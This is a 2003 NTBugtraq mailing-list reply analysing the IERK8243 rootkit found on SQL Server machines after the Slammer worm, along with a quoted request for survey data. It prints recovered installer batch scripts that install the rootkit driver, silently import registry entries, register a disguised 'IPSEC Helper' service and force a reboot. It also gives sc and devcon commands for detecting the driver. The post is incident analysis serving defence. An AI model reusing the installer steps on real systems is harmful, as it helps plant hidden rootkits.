Re: IERK Survey

From: Matt Scarborough (vexversa@VERIZON.NET)
Date: 01/30/03

  • Next message: Elisha Riedlinger: "Sygate Security Bulletin ID SS20030129-0002" 
    Date:         Thu, 30 Jan 2003 21:52:01 +0000
From: Matt Scarborough <vexversa@VERIZON.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    An unrelated case involved "Hacker Defender." While Hacker Defender is
    also a (more) powerful "rootkit," it is not the culprit here. I was
    wrong about that.

    Regarding six individuals who either
    (a) publicly posted about
    (b) contacted me via e-mail about
    the presence of IERK8243.SYS, all were running SQLServer 2000 or MSDE
    (Microsoft SQLServer 2000 Desktop Engine.)

    Recovered bits of an installer:

    SUI = ("Serv-U Installer?)

    files uploaded by FTP to victim

    sui.exe = SFXRAR IRC bot and pubstro
    sui2.exe = SFXRAR rootkit

    pss.exe = SysInternals PSShutdown.exe

    @del sui.exe /f
    @ren vmm32.exe vmm32.exe
    @vmm32.exe
    @pss.exe -t 0 -f -r -l
    @del g.bat /f

    @echo off
    del sui2.exe /f
    ren ipsechlp.dll ipsechlp.dll
    if not exist ierk8243.sys goto a
    ren ierk8243.sys ierk8243.sys
    move /y ierk8243.sys .\drivers
    :a
    if not exist ierk8243.reg goto b
    regedit /s ierk8243.reg
    del ierk8243.reg /f
    :b
    ipscf989.exe ipsechlp.dll
    del ipscf989.exe /f
    pss.exe -t 0 -f -r -l
    del pss.exe /f
    del g.bat /f

    Detection perhaps using SC.EXE or DEVCON.EXE from the Resource Kit or
    PSDK
    http://support.microsoft.com/?kbid=251192
    It appears the driver(s) cannot hide from directly querying the Services
    Database, locally or remotely.

    sc \\machinename query type= driver

    SERVICE_NAME: ierk8243
    DISPLAY_NAME: ierk8243
            TYPE : 1 KERNEL_DRIVER
            STATE : 4 RUNNING

    (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
            WIN32_EXIT_CODE : 0 (0x0)
            SERVICE_EXIT_CODE : 0 (0x0)
            CHECKPOINT : 0x0
            WAIT_HINT : 0x0

    devcon -m:\\machinename find @ROOT\LEGACY_IERK8243\0000

    devcon -m:\\machinename find @ROOT\LEGACY_POLICYAGENTHLP\0000

    ROOT\LEGACY_POLICYAGENTHLP\0000 :IPSEC Helper Services
    1 matching device(s) found.

    Matt Scarborough 2003-01-30

    On Thu, 30 Jan 2003 15:15:04 -0500, "Russ" wrote
    <E9A01F52DC939448BBDE44ED2E1C468F2406F6@muskie.rc.on.ca>

    > Folks,
    >
    > Here's an off-the-cuff premise that I'd like you to consider, and help
    > me prove or disprove.
    >
    > There have been a few posts (10 or so) from people who say they've found
    > IERK on their SQL boxes after dealing with Slammer. What if IERK were
    > placed on SQL boxes first, then, in order to get the driver installed
    > they launched Slammer to force people to reboot their boxes. By not
    > including anything in Slammer which dropped to the box, people wouldn't
    > be doing much to check the contents of the box after rebooting. If they
    > successfully placed IERK beforehand, its more likely they'd get it up
    > and running undetected.
    >
    > Would you please check your boxes as per this information;
    >
    > a) The IERK driver can be seen (without entering safe mode) by looking
    > at system information and then choosing Software environment and then
    > Drivers IERK will be listed. This situation only exists if the machine
    > has been rebooted.
    >
    > and/or
    >
    > b) Try to look at Services. If you have IPSEC Helper Services there
    > running, you have the Trojan.
    >
    > and/or
    >
    > c) Look for %systemroot%\system32\ipsechlp.dll
    >
    > and/or
    >
    > d) Run NETSTAT -AN and see if you are listening on port 449.
    >
    > Please, do me a favor, be brief in your response. Just tell me the
    > following information;
    >
    > 1. What OS/SP
    >
    > 2. What Server application is on it (SQL/IIS/Exchange) if any (if none,
    > say whether its a Workstation or Server)
    >
    > 3. How you discovered it (which of the above methods worked, a, b, c,
    > and/or d)
    >
    > 4. Whether you were listening on 449 *and* you found it using method a,
    > b, and/or c. This thing may not consistently listen on the same port.
    >
    > Reply to this message with your information.

    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    Delivery co-sponsored by TruSecure Corporation
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    TICSA - Anniversary Special - Limited Time

    Become TICSA certified for just $221.25 US when you register before 3/31/03
    with PROMO "TS0103" at www.2test.com. NO membership fees, certification
    good for 2 years. Price for international delivery just $296.25 US, with
    this offer. Offer cannot be combined with any other special and expires
    3/31/03. Visit www.trusecure.com/ticsa for full details.

    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo